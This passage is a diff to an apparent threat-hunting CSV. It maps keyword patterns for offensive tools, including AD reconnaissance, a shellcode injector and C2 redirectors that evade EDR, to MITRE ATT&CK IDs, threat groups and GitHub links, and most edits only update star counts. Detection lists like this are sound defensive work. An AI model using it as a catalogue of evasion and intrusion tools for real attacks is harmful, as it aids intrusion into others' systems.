T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-Domain*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-LocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-SPNs*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-Users.*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*recon-archy analyse*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy build*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy crawl*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon-archy-master*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*ReconUserGroupRoles.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*RecycledInjector.exe*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*RED_HAWK*","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Information Gathering","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","10","2611","837","2022-05-31T12:08:19Z","2017-06-11T05:02:35Z" +"*RecycledInjector.exe*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RecycledInjector-main*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*RED_HAWK*","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Information Gathering","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","10","2612","837","2022-05-31T12:08:19Z","2017-06-11T05:02:35Z" "*Red-Baron*","offensive_tool_keyword","Red-Baron","Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. secure and agile infrastructure for Red Teams.","T1583 - T1078 - T1027 - T1135","TA0002 - TA0003 - TA0040","N/A","N/A","Frameworks","https://github.com/byt3bl33d3r/Red-Baron","1","0","N/A","N/A","4","362","72","2020-03-05T07:19:43Z","2018-08-23T18:25:07Z" -"*redelk_backend_name_c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*redelk_backend_name_decoy*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*RedGuard.log*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*RedGuard/core*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*RedGuard_x64.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*RedGuard_x86.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*redelk_backend_name_c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redelk_backend_name_decoy*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedGuard.log*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard/core*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard_x64.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*RedGuard_x86.exe*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*redhuntlabs*","offensive_tool_keyword","redhuntlabs","documentation for offensive operation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*redhuntlabs/BucketLoot*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" "*RedHunt-OS*","offensive_tool_keyword","RedHunt-OS","Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt 